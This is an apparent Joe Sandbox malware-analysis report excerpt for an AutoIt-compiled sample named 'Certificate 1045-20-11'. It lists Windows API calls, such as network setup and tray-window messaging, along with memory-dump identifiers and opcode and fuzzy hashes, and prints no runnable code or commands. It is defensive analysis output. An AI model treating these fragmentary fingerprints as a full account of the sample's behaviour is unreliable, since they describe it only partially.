                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: InfoItemMenu_memset
                                                                                • String ID: 0
                                                                                • API String ID: 2223754486-4108050209
                                                                                • Opcode ID: 687bc2dbb292466f861b9f49b0286942975caaf9087150562e89abd8a54ece66
                                                                                • Instruction ID: 37825aeed2ec8faf2b6d0259fa046b06479cb7b0bfbd82839fd5d1557090a95d
                                                                                • Opcode Fuzzy Hash: 687bc2dbb292466f861b9f49b0286942975caaf9087150562e89abd8a54ece66
                                                                                • Instruction Fuzzy Hash: E511DD72901614EBDB21EAD8D944B9977B9FB06794F040125E941E72A0D7B0AE04CBA2
                                                                                APIs
                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00894DF5
                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00894E1E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$OpenOption
                                                                                • String ID: <local>
                                                                                • API String ID: 942729171-4266983199
                                                                                • Opcode ID: 47b17ff7061ba85293527fc9cfa4eebc786a2e9b6e54c39f7a8b85403ec66588
                                                                                • Instruction ID: f211a8179a45d937925d704fcd7077965d1fdfcae527a62841519eb51aa1ba3a
                                                                                • Opcode Fuzzy Hash: 47b17ff7061ba85293527fc9cfa4eebc786a2e9b6e54c39f7a8b85403ec66588
                                                                                • Instruction Fuzzy Hash: 5211EC74101225BBDF25AF61CC88EFBFBA8FF063A4F14822AF105D6140D3709842C6E0
                                                                                APIs
                                                                                • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0089A84E
                                                                                • htons.WSOCK32(00000000,?,00000000), ref: 0089A88B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: htonsinet_addr
                                                                                • String ID: 255.255.255.255
                                                                                • API String ID: 3832099526-2422070025
                                                                                • Opcode ID: 6e429e2d801203b53a6a5a10261eb2005925a13e3192356db857bb7b049fc915
                                                                                • Instruction ID: 140cddfafecc2e09f55cddc14986387ba33fca5be4a1312104e248ca1c144328
                                                                                • Opcode Fuzzy Hash: 6e429e2d801203b53a6a5a10261eb2005925a13e3192356db857bb7b049fc915
                                                                                • Instruction Fuzzy Hash: 1E01C475200304ABCB14BF68C846FA9B364FF44314F14843AE515E7291D671E8058792
                                                                                APIs
                                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0087B7EF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3850602802-1403004172
                                                                                • Opcode ID: 39f98fa5eee436362b65daa227a1c2958476170b8ce78671fd92c2303466f334
                                                                                • Instruction ID: 480f8fc63cedad8ed4640019ea15a79d8858f4d5217d3eaaaa8df5782ab9baaf
                                                                                • Opcode Fuzzy Hash: 39f98fa5eee436362b65daa227a1c2958476170b8ce78671fd92c2303466f334
                                                                                • Instruction Fuzzy Hash: 4101F171601118ABCB44EBA8CC42EFE337EFF05354B044619F872E72D6EB7098088791
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 0087B6EB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3850602802-1403004172
                                                                                • Opcode ID: a1ad9caa893104dc3a95fdcb458517ffed4b12bd2786d0953be0f3bd3539b789
                                                                                • Instruction ID: 9baaab740fa5ca0e9d03e0c65e1a8c6316fe58bb8b0e121d0e70288e755c886f
                                                                                • Opcode Fuzzy Hash: a1ad9caa893104dc3a95fdcb458517ffed4b12bd2786d0953be0f3bd3539b789
                                                                                • Instruction Fuzzy Hash: FA0184716411086BCB44EBA8C952FFE73BDFF15344B104019B606F3295DB549E1887A6
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 0087B76C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3850602802-1403004172
                                                                                • Opcode ID: 95e17674aa01c0019cbb03f9b7f7b27c52f5e16bbad6bcbac89640bfc85a6d86
                                                                                • Instruction ID: e6b3563b0d909f1b2c9bdd65e6b0dada51858e9b0c4836ab1a3ac810b34fb27a
                                                                                • Opcode Fuzzy Hash: 95e17674aa01c0019cbb03f9b7f7b27c52f5e16bbad6bcbac89640bfc85a6d86
                                                                                • Instruction Fuzzy Hash: 5501A271642108ABCB44EBA8C902FFE73ADFF15344B144019B905F3296DB649E0987B6
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ClassName_wcscmp
                                                                                • String ID: #32770
                                                                                • API String ID: 2292705959-463685578
                                                                                • Opcode ID: b9589b654e120844144978ac7df3c4bf0b5f26d8071fa0c8b3be44a63facb077
                                                                                • Instruction ID: 03336ad2fed8b5dcb2faeff8dbcf3c18103bf755562933b74ba8be85fba0fe85
                                                                                • Opcode Fuzzy Hash: b9589b654e120844144978ac7df3c4bf0b5f26d8071fa0c8b3be44a63facb077
                                                                                • Instruction Fuzzy Hash: 2EE092776043282BDB20EAA9AC4AE9BFBACFB61760F11002AB915D3141E674E601C7D4
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0087A63F
  • Part of subcall function 008613F1: _doexit.LIBCMT ref: 008613FB
Strings
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: dec6fa07f8fd4d425a476af9ee54d193b3a51691002b1713190ef73b5a75da1c
• Instruction ID: 5004d57cd45a941f0461e7c17d1df2e820c165493c33ec0a5360f648c0f3bad4
• Opcode Fuzzy Hash: dec6fa07f8fd4d425a476af9ee54d193b3a51691002b1713190ef73b5a75da1c
• Instruction Fuzzy Hash: ECD012323C471837D21436AC6C1BF99664CFB15B66F044026BB49D67C359E7D95041DA
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 008BACC0
• FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 008BAEBD
Strings
Similarity
• API ID: DirectoryFreeLibrarySystem
• String ID: WIN_XPe
• API String ID: 510247158-3257408948
• Opcode ID: e92f2c63afdc0a35bcfc19de582d9f0bd523c7c87cbdb697192ed4c4a197bf28
• Instruction ID: b25d5c04141b094b254831a6d6aee75ca8ebadd85323c8eee3ac00fad6c01409
• Opcode Fuzzy Hash: e92f2c63afdc0a35bcfc19de582d9f0bd523c7c87cbdb697192ed4c4a197bf28
• Instruction Fuzzy Hash: 65E03970C04209AFCB25EBA8D9449ECFFB8FB48301F148092E002F2660DB305A88DF22
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008A86A2
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 008A86B5
  • Part of subcall function 00887A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00887AD0
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: c5747ecc4d5c9f62cca9dd5a0f239c72142380c7de17ceaaf91813b43bdc6292
• Instruction ID: 859ef57b4b7896044e44f198d814e186870659f6657845972af5004217f6ce6e
• Opcode Fuzzy Hash: c5747ecc4d5c9f62cca9dd5a0f239c72142380c7de17ceaaf91813b43bdc6292
• Instruction Fuzzy Hash: 98D01271384368B7E26877709C4BFD6BA28FB58B11F110825B759EA2D0C9F4E940C754
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008A86E2
• PostMessageW.USER32(00000000), ref: 008A86E9
  • Part of subcall function 00887A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00887AD0
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: c75ed0059387f399aa242ab0b6be446c2d504ec9230e896ff934ffbacdb74c5c
• Instruction ID: 3ae88c354620590fc84d192ae6ce85b8369389c5fc8ed947b563cdd32ee08bed
• Opcode Fuzzy Hash: c75ed0059387f399aa242ab0b6be446c2d504ec9230e896ff934ffbacdb74c5c
• Instruction Fuzzy Hash: AFD012713853687BF26877709C4BFC6BA28FB58B11F110825B755EA2D0C9F4E940C755